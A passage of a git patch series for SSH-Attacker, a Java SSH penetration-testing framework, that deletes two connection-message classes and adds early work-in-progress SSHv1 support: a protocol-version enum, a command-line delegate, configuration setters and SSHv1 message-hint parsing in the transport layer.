b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java deleted file mode 100644 index 15e4e3947..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java +++ /dev/null @@ -1,40 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.connection.preparator; - -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; -import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class ConnectionMessagePreparator extends ProtocolMessagePreparator { - private static final Logger LOGGER = LogManager.getLogger(); - - private final ConnectionMessage msg; - - public ConnectionMessagePreparator(Chooser chooser, ConnectionMessage message) { - super(chooser, message); - this.msg = message; - } - - @Override - protected void prepareProtocolMessageContents() { - LOGGER.debug("Preparing ApplicationMessage"); - prepareData(msg); - } - - private void prepareData(ConnectionMessage msg) { - if (msg.getDataConfig() != null) { - msg.setData(msg.getDataConfig()); - } else { - msg.setData(chooser.getLastHandledAuthenticationMessageData()); - } - LOGGER.debug("Data: {}", msg.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java deleted file mode 100644 index 2b6b5aba3..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java +++ /dev/null @@ -1,40 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.connection.serializer; - -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class ConnectionMessageSerializer extends ProtocolMessageSerializer { - - private static final Logger LOGGER = LogManager.getLogger(); - - /** - * Constructor for the ApplicationMessageSerializer - * - * @param message Message that should be serialized - */ - public ConnectionMessageSerializer(ConnectionMessage message) { - super(message); - } - - @Override - protected byte[] serializeBytes() { - LOGGER.debug("Serializing ApplicationMessage"); - writeData(); - return getAlreadySerialized(); - } - - /** Writes the data of the ApplicationMessage into the final byte[] */ - private void writeData() { - appendBytes(message.getData().getValue()); - LOGGER.debug("Data: {}", message.getData().getValue()); - } -} From 360284c97a9e81439962e078d9ec1425f58527fc Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 28 Jul 2023 23:03:35 +0200 Subject: [PATCH 047/176] wip: introducing simple sshv1 functions: - basic Layer for SSHv1 Messages - basic PacketLayerTypes for SSHv1 Messages - basic PacketLayerHints for SSHv1 Messages --- .idea/misc.xml | 1 - .../client/config/ClientCommandConfig.java | 3 + .../nds/sshattacker/core/config/Config.java | 15 ++ .../delegate/ProtocolVersionDelegate.java | 62 +++++ .../constants/ProtocolMessageTypeSSHV1.java | 227 +++++++++--------- .../core/constants/ProtocolVersion.java | 21 ++ .../layer/hints/PacketLayerHintSSHV1.java | 2 - .../core/layer/impl/SSH1Layer.java | 13 +- .../core/layer/impl/TransportLayer.java | 19 +- .../core/packet/AbstractPacket.java | 2 +- .../message/VersionExchangeMessage.java | 2 +- .../core/workflow/action/MessageAction.java | 4 +- .../core/workflow/action/ReceiveAction.java | 4 +- .../server/config/ServerCommandConfig.java | 3 + 14 files changed, 245 insertions(+), 133 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ProtocolVersionDelegate.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolVersion.java diff --git a/.idea/misc.xml b/.idea/misc.xml index 1465bc128..b0a578382 100644 --- a/.idea/misc.xml +++ b/.idea/misc.xml @@ -1,4 +1,3 @@ - diff --git a/SSH-Client/src/main/java/de/rub/nds/sshattacker/client/config/ClientCommandConfig.java b/SSH-Client/src/main/java/de/rub/nds/sshattacker/client/config/ClientCommandConfig.java index fbc4196ef..670e9ea51 100755 --- a/SSH-Client/src/main/java/de/rub/nds/sshattacker/client/config/ClientCommandConfig.java +++ b/SSH-Client/src/main/java/de/rub/nds/sshattacker/client/config/ClientCommandConfig.java @@ -23,6 +23,7 @@ public class ClientCommandConfig extends SshDelegateConfig { @ParametersDelegate private final WorkflowInputDelegate workflowInputDelegate; @ParametersDelegate private final WorkflowOutputDelegate workflowOutputDelegate; @ParametersDelegate private final WorkflowTypeDelegate workflowTypeDelegate; + @ParametersDelegate private final ProtocolVersionDelegate protocolVersionDelegate; public ClientCommandConfig(GeneralDelegate delegate) { super(delegate); @@ -32,12 +33,14 @@ public ClientCommandConfig(GeneralDelegate delegate) { this.workflowInputDelegate = new WorkflowInputDelegate(); this.workflowOutputDelegate = new WorkflowOutputDelegate(); this.workflowTypeDelegate = new WorkflowTypeDelegate(); + this.protocolVersionDelegate = new ProtocolVersionDelegate(); addDelegate(clientDelegate); addDelegate(configOutputDelegate); addDelegate(timeoutDelegate); addDelegate(workflowInputDelegate); addDelegate(workflowOutputDelegate); addDelegate(workflowTypeDelegate); + addDelegate(protocolVersionDelegate); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 854f4eaec..94d09fa56 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -439,6 +439,10 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { /** Fallback for type of chooser, to initialize the chooser in the SshContext */ private ChooserType chooserType = ChooserType.DEFAULT; + public void setDefaultLayerConfiguration(LayerConfiguration defaultLayerConfiguration) { + this.defaultLayerConfiguration = defaultLayerConfiguration; + } + private LayerConfiguration defaultLayerConfiguration; public CompressionAlgorithm getDefaultSelectedCompressionAlgorithm() { @@ -467,12 +471,23 @@ public KeyExchangeAlgorithm getDefaultSelectedKeyExchangeAlgorithm() { private KeyExchangeAlgorithm defaultSelectedKeyExchangeAlgorithm = KeyExchangeAlgorithm.DIFFIE_HELLMAN_GROUP14_SHA256; + public ProtocolVersion getProtocolVersion() { + return protocolVersion; + } + + public void setProtocolVersion(ProtocolVersion protocolVersion) { + this.protocolVersion = protocolVersion; + } + + private ProtocolVersion protocolVersion; + // region Constructors and Initialization public Config() { defaultClientConnection = new OutboundConnection("client", 65222, "localhost"); defaultServerConnection = new InboundConnection("server", 65222, "localhost"); + protocolVersion = ProtocolVersion.SSH2; defaultLayerConfiguration = LayerConfiguration.SSHv2; // region VersionExchange initialization diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ProtocolVersionDelegate.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ProtocolVersionDelegate.java new file mode 100644 index 000000000..cfe35f553 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ProtocolVersionDelegate.java @@ -0,0 +1,62 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.config.delegate; + +import com.beust.jcommander.Parameter; +import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.constants.ProtocolVersion; +import de.rub.nds.sshattacker.core.layer.constant.LayerConfiguration; +import de.rub.nds.tlsattacker.transport.TransportHandlerType; + +public class ProtocolVersionDelegate extends Delegate { + + @Parameter(names = "-version", description = "Highest supported protocol version ") + private ProtocolVersion protocolVersion = null; + + public ProtocolVersionDelegate() {} + + public ProtocolVersionDelegate(ProtocolVersion protocolVersion) { + this.protocolVersion = protocolVersion; + } + + public ProtocolVersion getProtocolVersion() { + return protocolVersion; + } + + public void setProtocolVersion(ProtocolVersion protocolVersion) { + this.protocolVersion = protocolVersion; + } + + @Override + public void applyDelegate(Config config) { + if (protocolVersion == null) { + return; + } + + config.setProtocolVersion(protocolVersion); + TransportHandlerType th = TransportHandlerType.TCP; + if (config.getProtocolVersion().isSSHv2()) { + config.setDefaultLayerConfiguration(LayerConfiguration.SSHv2); + } else if (config.getProtocolVersion().isSSHv1()) { + config.setDefaultLayerConfiguration(LayerConfiguration.SSHv1); + } else { + LOGGER.error("[bro] does not initalize with sshv1 or sshv2"); + throw new RuntimeException(); + } + + /* if (config.getDefaultClientConnection() == null) { + config.setDefaultClientConnection(new OutboundConnection()); + } + if (config.getDefaultServerConnection() == null) { + config.setDefaultServerConnection(new InboundConnection()); + } + config.getDefaultClientConnection().setTransportHandlerType(th); + config.getDefaultServerConnection().setTransportHandlerType(th); + */ + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java index 6c46efb76..854524929 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java @@ -11,8 +11,7 @@ import java.util.Map; public enum ProtocolMessageTypeSSHV1 { - - VERSION_EXCHANGE_MESSAGE((byte) 0), + VERSION_EXCHANGE_MESSAG_ESSH1((byte) 0), ASCII_MESSAGE((byte) 40), SSH_MSG_DISCONNECT((byte) 1), SSH_SMSG_PUBLIC_KEY((byte) 2), @@ -52,118 +51,118 @@ public enum ProtocolMessageTypeSSHV1 { SSH_CMSG_REQUEST_COMPRESSION((byte) 37); /* - // 9 - 19 unassigned (transport layer generic) - SSH_MSG_KEXINIT((byte) 20), - SSH_MSG_NEWKEYS((byte) 21), - // 22 - 29 unassigned (algorithm negotiation) - // 30 - 49 reserved (key exchange method specific) - // [ RFC 4419 ] - SSH_MSG_KEX_DH_GEX_REQUEST_OLD((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_REQUEST((byte) 34, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_GROUP((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_INIT((byte) 32, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_REPLY((byte) 33, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - // [ RFC 4253 ] - SSH_MSG_KEXDH_INIT((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN), - SSH_MSG_KEXDH_REPLY((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN), - // [ https://datatracker.ietf.org/doc/html/draft-kampanakis-curdle-pq-ssh-00 ] - SSH_MSG_HBR_INIT((byte) 30, KeyExchangeFlowType.HYBRID), - SSH_MSG_HBR_REPLY((byte) 31, KeyExchangeFlowType.HYBRID), - // [ RFC 5656 ] - SSH_MSG_KEX_ECDH_INIT((byte) 30, KeyExchangeFlowType.ECDH), - SSH_MSG_KEX_ECDH_REPLY((byte) 31, KeyExchangeFlowType.ECDH), - SSH_MSG_ECMQV_INIT((byte) 30, KeyExchangeFlowType.ECMQV), - SSH_MSG_ECMQV_REPLY((byte) 31, KeyExchangeFlowType.ECMQV), - // [ RFC 4432 ] - SSH_MSG_KEXRSA_PUBKEY((byte) 30, KeyExchangeFlowType.RSA), - SSH_MSG_KEXRSA_SECRET((byte) 31, KeyExchangeFlowType.RSA), - SSH_MSG_KEXRSA_DONE((byte) 32, KeyExchangeFlowType.RSA), - // [ RFC 4462 ] - // TODO: Add specificTo on GSS messages - SSH_MSG_KEXGSS_INIT((byte) 30), - SSH_MSG_KEXGSS_CONTINUE((byte) 31), - SSH_MSG_KEXGSS_COMPLETE((byte) 32), - SSH_MSG_KEXGSS_HOSTKEY((byte) 33), - SSH_MSG_KEXGSS_ERROR((byte) 34), - SSH_MSG_KEXGSS_GROUPREQ((byte) 40), - SSH_MSG_KEXGSS_GROUP((byte) 41), - // [ RFC 4252 ] - SSH_MSG_USERAUTH_REQUEST((byte) 50), - SSH_MSG_USERAUTH_FAILURE((byte) 51), - SSH_MSG_USERAUTH_SUCCESS((byte) 52), - SSH_MSG_USERAUTH_BANNER((byte) 53), - // 54 - 59 unassigned (user authentication generic) - // 60 - 79 reserved (user authentication method specific) - // [ RFC 4252 ] - SSH_MSG_USERAUTH_PK_OK((byte) 60, AuthenticationMethod.PUBLICKEY), - SSH_MSG_USERAUTH_PASSWD_CHANGEREQ((byte) 60, AuthenticationMethod.PASSWORD), - // [ RFC 4256 ] - SSH_MSG_USERAUTH_INFO_REQUEST((byte) 60, AuthenticationMethod.KEYBOARD_INTERACTIVE), - SSH_MSG_USERAUTH_INFO_RESPONSE((byte) 61, AuthenticationMethod.KEYBOARD_INTERACTIVE), - // [ RFC 4462 ] - SSH_MSG_USERAUTH_GSSAPI_RESPONSE( - (byte) 60, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_TOKEN( - (byte) 61, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE( - (byte) 63, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_ERROR( - (byte) 64, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_ERRTOK( - (byte) 65, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_MIC( - (byte) 66, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - // [ RFC 4254 ] - SSH_MSG_GLOBAL_REQUEST((byte) 80), - SSH_MSG_REQUEST_SUCCESS((byte) 81), - SSH_MSG_REQUEST_FAILURE((byte) 82), - // 83 - 89 unassigned (connection protocol generic) - SSH_MSG_CHANNEL_OPEN((byte) 90), - SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 91), - SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 92), - SSH_MSG_CHANNEL_WINDOW_ADJUST((byte) 93), - SSH_MSG_CHANNEL_DATA((byte) 94), - SSH_MSG_CHANNEL_EXTENDED_DATA((byte) 95), - SSH_MSG_CHANNEL_EOF((byte) 96), - SSH_MSG_CHANNEL_CLOSE((byte) 97), - SSH_MSG_CHANNEL_REQUEST((byte) 98), - SSH_MSG_CHANNEL_SUCCESS((byte) 99), - SSH_MSG_CHANNEL_FAILURE((byte) 100), - // 101 - 127 unassigned (channel related messages) - // 128 - 191 reserved (for client protocols) - // 192 - 255 reserved for private use (local extensions) - UNKNOWN((byte) 255); -*/ + // 9 - 19 unassigned (transport layer generic) + SSH_MSG_KEXINIT((byte) 20), + SSH_MSG_NEWKEYS((byte) 21), + // 22 - 29 unassigned (algorithm negotiation) + // 30 - 49 reserved (key exchange method specific) + // [ RFC 4419 ] + SSH_MSG_KEX_DH_GEX_REQUEST_OLD((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_REQUEST((byte) 34, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_GROUP((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_INIT((byte) 32, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_REPLY((byte) 33, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + // [ RFC 4253 ] + SSH_MSG_KEXDH_INIT((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN), + SSH_MSG_KEXDH_REPLY((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN), + // [ https://datatracker.ietf.org/doc/html/draft-kampanakis-curdle-pq-ssh-00 ] + SSH_MSG_HBR_INIT((byte) 30, KeyExchangeFlowType.HYBRID), + SSH_MSG_HBR_REPLY((byte) 31, KeyExchangeFlowType.HYBRID), + // [ RFC 5656 ] + SSH_MSG_KEX_ECDH_INIT((byte) 30, KeyExchangeFlowType.ECDH), + SSH_MSG_KEX_ECDH_REPLY((byte) 31, KeyExchangeFlowType.ECDH), + SSH_MSG_ECMQV_INIT((byte) 30, KeyExchangeFlowType.ECMQV), + SSH_MSG_ECMQV_REPLY((byte) 31, KeyExchangeFlowType.ECMQV), + // [ RFC 4432 ] + SSH_MSG_KEXRSA_PUBKEY((byte) 30, KeyExchangeFlowType.RSA), + SSH_MSG_KEXRSA_SECRET((byte) 31, KeyExchangeFlowType.RSA), + SSH_MSG_KEXRSA_DONE((byte) 32, KeyExchangeFlowType.RSA), + // [ RFC 4462 ] + // TODO: Add specificTo on GSS messages + SSH_MSG_KEXGSS_INIT((byte) 30), + SSH_MSG_KEXGSS_CONTINUE((byte) 31), + SSH_MSG_KEXGSS_COMPLETE((byte) 32), + SSH_MSG_KEXGSS_HOSTKEY((byte) 33), + SSH_MSG_KEXGSS_ERROR((byte) 34), + SSH_MSG_KEXGSS_GROUPREQ((byte) 40), + SSH_MSG_KEXGSS_GROUP((byte) 41), + // [ RFC 4252 ] + SSH_MSG_USERAUTH_REQUEST((byte) 50), + SSH_MSG_USERAUTH_FAILURE((byte) 51), + SSH_MSG_USERAUTH_SUCCESS((byte) 52), + SSH_MSG_USERAUTH_BANNER((byte) 53), + // 54 - 59 unassigned (user authentication generic) + // 60 - 79 reserved (user authentication method specific) + // [ RFC 4252 ] + SSH_MSG_USERAUTH_PK_OK((byte) 60, AuthenticationMethod.PUBLICKEY), + SSH_MSG_USERAUTH_PASSWD_CHANGEREQ((byte) 60, AuthenticationMethod.PASSWORD), + // [ RFC 4256 ] + SSH_MSG_USERAUTH_INFO_REQUEST((byte) 60, AuthenticationMethod.KEYBOARD_INTERACTIVE), + SSH_MSG_USERAUTH_INFO_RESPONSE((byte) 61, AuthenticationMethod.KEYBOARD_INTERACTIVE), + // [ RFC 4462 ] + SSH_MSG_USERAUTH_GSSAPI_RESPONSE( + (byte) 60, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_TOKEN( + (byte) 61, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE( + (byte) 63, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_ERROR( + (byte) 64, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_ERRTOK( + (byte) 65, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_MIC( + (byte) 66, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + // [ RFC 4254 ] + SSH_MSG_GLOBAL_REQUEST((byte) 80), + SSH_MSG_REQUEST_SUCCESS((byte) 81), + SSH_MSG_REQUEST_FAILURE((byte) 82), + // 83 - 89 unassigned (connection protocol generic) + SSH_MSG_CHANNEL_OPEN((byte) 90), + SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 91), + SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 92), + SSH_MSG_CHANNEL_WINDOW_ADJUST((byte) 93), + SSH_MSG_CHANNEL_DATA((byte) 94), + SSH_MSG_CHANNEL_EXTENDED_DATA((byte) 95), + SSH_MSG_CHANNEL_EOF((byte) 96), + SSH_MSG_CHANNEL_CLOSE((byte) 97), + SSH_MSG_CHANNEL_REQUEST((byte) 98), + SSH_MSG_CHANNEL_SUCCESS((byte) 99), + SSH_MSG_CHANNEL_FAILURE((byte) 100), + // 101 - 127 unassigned (channel related messages) + // 128 - 191 reserved (for client protocols) + // 192 - 255 reserved for private use (local extensions) + UNKNOWN((byte) 255); + */ private byte value; private final Enum[] specificTo; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolVersion.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolVersion.java new file mode 100644 index 000000000..e948d4989 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolVersion.java @@ -0,0 +1,21 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.constants; + +public enum ProtocolVersion { + SSH1, + SSH2; + + public boolean isSSHv2() { + return this == SSH2; + } + + public boolean isSSHv1() { + return this == SSH1; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java index 8bb81a427..d3c270959 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java @@ -7,9 +7,7 @@ */ package de.rub.nds.sshattacker.core.layer.hints; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.constants.ProtocolMessageTypeSSHV1; - import java.util.Objects; /** diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 365c87029..aace52884 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -32,14 +32,11 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.protocol.common.*; - -import java.io.ByteArrayOutputStream; -import java.io.IOException; - import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; -import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; +import java.io.ByteArrayOutputStream; +import java.io.IOException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -170,6 +167,7 @@ public LayerProcessingResult receiveData() { readUnknownProtocolData(); } else if (tempHint instanceof PacketLayerHintSSHV1) { PacketLayerHintSSHV1 hint = (PacketLayerHintSSHV1) dataStream.getHint(); + LOGGER.debug("[bro] reading message for Hint {}", hint.getType()); readMessageForHint(hint); } // receive until the layer configuration is satisfied or no data is left @@ -191,11 +189,11 @@ private void readUnknownProtocolData() { public void readMessageForHint(PacketLayerHintSSHV1 hint) { switch (hint.getType()) { - // use correct parser for the message + // use correct parser for the message case ASCII_MESSAGE: readASCIIData(); break; - case VERSION_EXCHANGE_MESSAGE: + case VERSION_EXCHANGE_MESSAG_ESSH1: readVersionExchangeProtocolData(); case SSH_CMSG_AUTH_RHOSTS_RSA: // Read CMSG_AUTH_RHOSTS_RSA @@ -311,7 +309,6 @@ public void readMessageForHint(PacketLayerHintSSHV1 hint) { } } - private void readASCIIData() { AsciiMessage message = new AsciiMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 5d125b965..cca6a957e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.constants.ProtocolMessageTypeSSHV1; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; @@ -20,6 +21,7 @@ import de.rub.nds.sshattacker.core.layer.data.Serializer; import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; +import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHintSSHV1; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; @@ -169,12 +171,20 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException packet.setCleanProtocolMessageBytes(packet.getPayload()); addProducedContainer(packet); - PacketLayerHint currentHint; + LayerProcessingHint currentHint; // currentHint = new PacketLayerHint(packet.getContentMessageType()); currentHint = parseMessageId(packet, context); - LOGGER.debug("[bro] got hint: " + currentHint.getType()); + if (currentHint instanceof PacketLayerHint) { + PacketLayerHint p_hint = (PacketLayerHint) currentHint; + LOGGER.debug("[bro] got hint V2: " + p_hint.getType()); + } else if (currentHint instanceof PacketLayerHintSSHV1) { + PacketLayerHintSSHV1 p_hint = (PacketLayerHintSSHV1) currentHint; + LOGGER.debug("[bro] got hint V1: " + p_hint.getType()); + } + + // LOGGER.debug("[bro] got hint: " + currentHint.getType()); if (desiredHint == null || currentHint.equals(desiredHint)) { if (currentInputStream == null) { @@ -223,14 +233,15 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } } - public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) { + public LayerProcessingHint parseMessageId(AbstractPacket packet, SshContext context) { byte[] raw = packet.getPayload().getValue(); if (packet instanceof BlobPacket) { String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); if (rawText.startsWith("SSH-2")) { return new PacketLayerHint(ProtocolMessageType.VERSION_EXCHANGE_MESSAGE); } else if (rawText.startsWith("SSH-1")) { - return new PacketLayerHint(ProtocolMessageType.VERSION_EXCHANGE_MESSAGE); + return new PacketLayerHintSSHV1( + ProtocolMessageTypeSSHV1.VERSION_EXCHANGE_MESSAG_ESSH1); } else { final AsciiMessage message = new AsciiMessage(); AsciiMessageParser parser = new AsciiMessageParser(new ByteArrayInputStream(raw)); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java index ab323af6a..b14101419 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java @@ -48,7 +48,7 @@ public void setCleanProtocolMessageBytes(ModifiableByteArray cleanProtocolMessag this.cleanProtocolMessageBytes = cleanProtocolMessageBytes; } - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) + /* @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE)*/ private ModifiableByteArray cleanProtocolMessageBytes; public ProtocolMessageType getContentMessageType() { diff --git 